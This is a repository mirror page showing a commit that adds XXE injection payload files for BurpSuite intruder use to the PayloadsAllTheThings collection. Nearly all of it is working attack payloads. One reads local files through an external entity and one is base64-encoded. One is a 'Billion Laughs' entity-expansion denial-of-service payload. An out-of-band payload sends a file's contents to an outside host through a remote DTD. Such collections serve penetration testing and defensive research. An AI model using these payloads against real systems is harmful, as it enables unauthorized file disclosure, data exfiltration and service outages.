gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-03-01 15:03:12 -08:00
Code Issues Packages Projects Releases Wiki Activity

More intruders folder - for BurpSuite

Browse Source
This commit is contained in:
Swissky
2017-07-30 13:42:32 +02:00
parent 8a3693855f
commit af48fc1ed4
15 changed files with 321 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
XXE injections/Files/Classic XXE B64 Encoded.xml Executable file
View File

@@ -0,0 +1 @@
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>

6
XXE injections/Files/Classic XXE.xml Executable file
View File

@@ -0,0 +1,6 @@
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///sys/power/image_size">
]>
<data>&file;</data>

8
XXE injections/Files/Deny Of Service - Billion Laugh Attack Executable file
View File

@@ -0,0 +1,8 @@
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

9
XXE injections/Files/XXE OOB Attack (Yunusov, 2013).xml Executable file
View File

@@ -0,0 +1,9 @@
XXE OOB Attack (Yunusov, 2013)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>
File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;